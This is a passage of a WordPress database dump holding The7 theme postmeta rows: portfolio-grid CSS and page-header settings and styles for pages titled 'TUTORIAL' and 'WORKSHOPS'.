.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\n  background: #f7f7f7;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\n  top: 20px;\n  right: 20px;\n  bottom: 20px;\n  left: 20px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-head-wrapper,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-wrapper {\n  right: 30px;\n  left: 30px;\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content {\n  background: none;\n  padding: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content:before {\n  background: #f7f7f7;\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\n  bottom: -15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\n  bottom: -5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\n  bottom: -20px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\n  bottom: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a * {\n  color: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a * {\n  color: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article {\n  margin-top: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n  padding-top: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.hover-scale article:after {\n  background: ;\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap *,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: ;\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\n  box-shadow: \"\";\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\n  box-shadow: \"\";\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\n  box-shadow: \"\";\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\n  box-shadow: \"\";\n}\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\n  border-width: 0px;\n}\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-style: ;\n  font-weight: bold;\n  text-transform: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta * {\n  font-style: ;\n  font-weight: ;\n  text-transform: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\n  margin-bottom: 5px;\n  font-style: ;\n  font-weight: ;\n  text-transform: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  min-width: ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}'),
(26917,3670,'_the7_imported_item','software-company'),
(26919,3670,'_dt_microsite_primary_menu','5'),
(26920,3670,'_dt_microsite_split_left_menu','5'),
(26921,3670,'_dt_microsite_split_right_menu','5'),
(26922,3670,'_dt_microsite_mobile_menu','5'),
(26923,3670,'_dt_page_overrides_right_margin',''),
(26924,3670,'_dt_page_overrides_left_margin',''),
(26925,3670,'_dt_mobile_page_padding_top',''),
(26926,3670,'_dt_mobile_page_padding_right',''),
(26927,3670,'_dt_mobile_page_padding_bottom',''),
(26928,3670,'_dt_mobile_page_padding_left',''),
(26929,3670,'_thumbnail_id','3274'),
(26930,3670,'_dt_fancy_header_layout_heading',''),
(26931,3670,'_dt_fancy_header_title_aligment','center'),
(26932,3670,'_dt_fancy_header_height','300'),
(26933,3670,'_dt_fancy_header_padding-top','0px'),
(26934,3670,'_dt_fancy_header_padding-bottom','0px'),
(26935,3670,'_dt_fancy_header_breadcrumbs_heading',''),
(26936,3670,'_dt_fancy_header_breadcrumbs','disabled'),
(26937,3670,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(26938,3670,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(26939,3670,'_dt_fancy_header_title_heading',''),
(26940,3670,'_dt_fancy_header_title_mode','custom'),
(26941,3670,'_dt_fancy_header_title','TUTORIAL'),
(26942,3670,'_dt_fancy_header_title_font_size','50'),
(26943,3670,'_dt_fancy_header_title_line_height','36'),
(26944,3670,'_dt_fancy_header_text_transform','none'),
(26945,3670,'_dt_fancy_header_title_color_mode','color'),
(26946,3670,'_dt_fancy_header_title_color','#ffffff'),
(26947,3670,'_dt_fancy_header_subtitle_heading',''),
(26948,3670,'_dt_fancy_header_subtitle',''),
(26949,3670,'_dt_fancy_header_subtitle_font_size','18'),
(26950,3670,'_dt_fancy_header_subtitle_line_height','26'),
(26951,3670,'_dt_fancy_header_subtitle_text_transform','none'),
(26952,3670,'_dt_fancy_header_subtitle_color_mode','color'),
(26953,3670,'_dt_fancy_header_subtitle_color','#ffffff'),
(26954,3670,'_dt_fancy_header_bg_heading',''),
(26955,3670,'_dt_fancy_header_bg_color','#222222'),
(26956,3670,'_dt_fancy_header_bg_image_origin','featured_image'),
(26957,3670,'_dt_fancy_header_bg_image','a:0:{}'),
(26958,3670,'_dt_fancy_header_bg_repeat','no-repeat'),
(26959,3670,'_dt_fancy_header_bg_position_x','center'),
(26960,3670,'_dt_fancy_header_bg_position_y','center'),
(26961,3670,'_dt_fancy_header_bg_fullscreen','1'),
(26962,3670,'_dt_fancy_header_bg_overlay','0'),
(26963,3670,'_dt_fancy_header_overlay_color','#000'),
(26964,3670,'_dt_fancy_header_bg_overlay_opacity','50'),
(26965,3670,'_dt_fancy_header_scroll_effect','default'),
(26966,3670,'_dt_fancy_header_bg_parallax','0.5'),
(26967,3670,'_dt_fancy_header_responsiveness_heading',''),
(26968,3670,'_dt_fancy_header_responsiveness','enabled'),
(26969,3670,'_dt_fancy_header_responsiveness_switch','778px'),
(26970,3670,'_dt_fancy_header_responsive_height','70'),
(26971,3670,'_dt_fancy_header_responsive_font_size','30'),
(26972,3670,'_dt_fancy_header_responsive_title_line_height','38'),
(26973,3670,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(26974,3670,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(26975,3670,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(26976,3670,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/Egypt2-e1668179241642.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(26977,3670,'_dp_original','2372'),
(26978,3670,'_edit_lock','1692074150:1'),
(26979,3670,'_edit_last','1'),
(26980,3671,'_wpb_vc_js_status','true'),
(26981,3671,'_dt_sidebar_position','disabled'),
(26982,3671,'_dt_sidebar_widgetarea_id','sidebar_1'),
(26983,3671,'_dt_sidebar_hide_on_mobile','0'),
(26984,3671,'_dt_footer_show','0'),
(26985,3671,'_dt_footer_widgetarea_id','sidebar_2'),
(26986,3671,'_dt_footer_hide_on_mobile','0'),
(26987,3671,'_dt_header_title','fancy'),
(26988,3671,'_dt_header_background','normal'),
(26989,3671,'_dt_header_background_below_slideshow','disabled'),
(26990,3671,'_dt_header_transparent_bg_color_scheme','light'),
(26991,3671,'_dt_header_transparent_top_bar_bg_color',''),
(26992,3671,'_dt_header_transparent_top_bar_bg_opacity','0'),
(26993,3671,'_dt_header_transparent_bg_color','#000000'),
(26994,3671,'_dt_header_transparent_bg_opacity','50'),
(26995,3671,'_dt_header_disabled_background','normal'),
(26996,3671,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(26997,3671,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(26998,3671,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(26999,3671,'_dt_header_disabled_transparent_bg_color','#000000'),
(27000,3671,'_dt_header_disabled_transparent_bg_opacity','50'),
(27001,3671,'_dt_page_overrides_top_margin',''),
(27002,3671,'_dt_page_overrides_right_margin',''),
(27003,3671,'_dt_page_overrides_bottom_margin',''),
(27004,3671,'_dt_page_overrides_left_margin',''),
(27005,3671,'_dt_mobile_page_padding_top',''),
(27006,3671,'_dt_mobile_page_padding_right',''),
(27007,3671,'_dt_mobile_page_padding_bottom',''),
(27008,3671,'_dt_mobile_page_padding_left',''),
(27009,3671,'_dt_fancy_header_layout_heading',''),
(27010,3671,'_dt_fancy_header_title_aligment','center'),
(27011,3671,'_dt_fancy_header_height','300'),
(27012,3671,'_dt_fancy_header_padding-top','0px'),
(27013,3671,'_dt_fancy_header_padding-bottom','0px'),
(27014,3671,'_dt_fancy_header_breadcrumbs_heading',''),
(27015,3671,'_dt_fancy_header_breadcrumbs','disabled'),
(27016,3671,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(27017,3671,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(27018,3671,'_dt_fancy_header_title_heading',''),
(27019,3671,'_dt_fancy_header_title_mode','custom'),
(27020,3671,'_dt_fancy_header_title','WORKSHOPS'),
(27021,3671,'_dt_fancy_header_title_font_size','30'),
(27022,3671,'_dt_fancy_header_title_line_height','36'),
(27023,3671,'_dt_fancy_header_text_transform','none'),
(27024,3671,'_dt_fancy_header_title_color_mode','color'),
(27025,3671,'_dt_fancy_header_title_color','#ffffff'),
(27026,3671,'_dt_fancy_header_subtitle_heading',''),
(27027,3671,'_dt_fancy_header_subtitle',''),
(27028,3671,'_dt_fancy_header_subtitle_font_size','18'),
(27029,3671,'_dt_fancy_header_subtitle_line_height','26'),
(27030,3671,'_dt_fancy_header_subtitle_text_transform','none'),
(27031,3671,'_dt_fancy_header_subtitle_color_mode','color'),
(27032,3671,'_dt_fancy_header_subtitle_color','#ffffff'),
(27033,3671,'_dt_fancy_header_bg_heading',''),
(27034,3671,'_dt_fancy_header_bg_color','#222222'),
(27035,3671,'_dt_fancy_header_bg_image_origin','featured_image'),
(27036,3671,'_dt_fancy_header_bg_image','a:0:{}'),
(27037,3671,'_dt_fancy_header_bg_repeat','no-repeat'),
(27038,3671,'_dt_fancy_header_bg_position_x','center'),
(27039,3671,'_dt_fancy_header_bg_position_y','center'),
(27040,3671,'_dt_fancy_header_bg_fullscreen','1'),
(27041,3671,'_dt_fancy_header_bg_overlay','0'),
(27042,3671,'_dt_fancy_header_overlay_color','#000'),
(27043,3671,'_dt_fancy_header_bg_overlay_opacity','50'),
(27044,3671,'_dt_fancy_header_scroll_effect','default'),
(27045,3671,'_dt_fancy_header_bg_parallax','0.5'),
(27046,3671,'_dt_fancy_header_responsiveness_heading',''),
(27047,3671,'_dt_fancy_header_responsiveness','enabled'),
(27048,3671,'_dt_fancy_header_responsiveness_switch','778px'),
(27049,3671,'_dt_fancy_header_responsive_height','70'),
(27050,3671,'_dt_fancy_header_responsive_font_size','30'),
(27051,3671,'_dt_fancy_header_responsive_title_line_height','38'),
(27052,3671,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(27053,3671,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(27054,3671,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(27055,3671,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 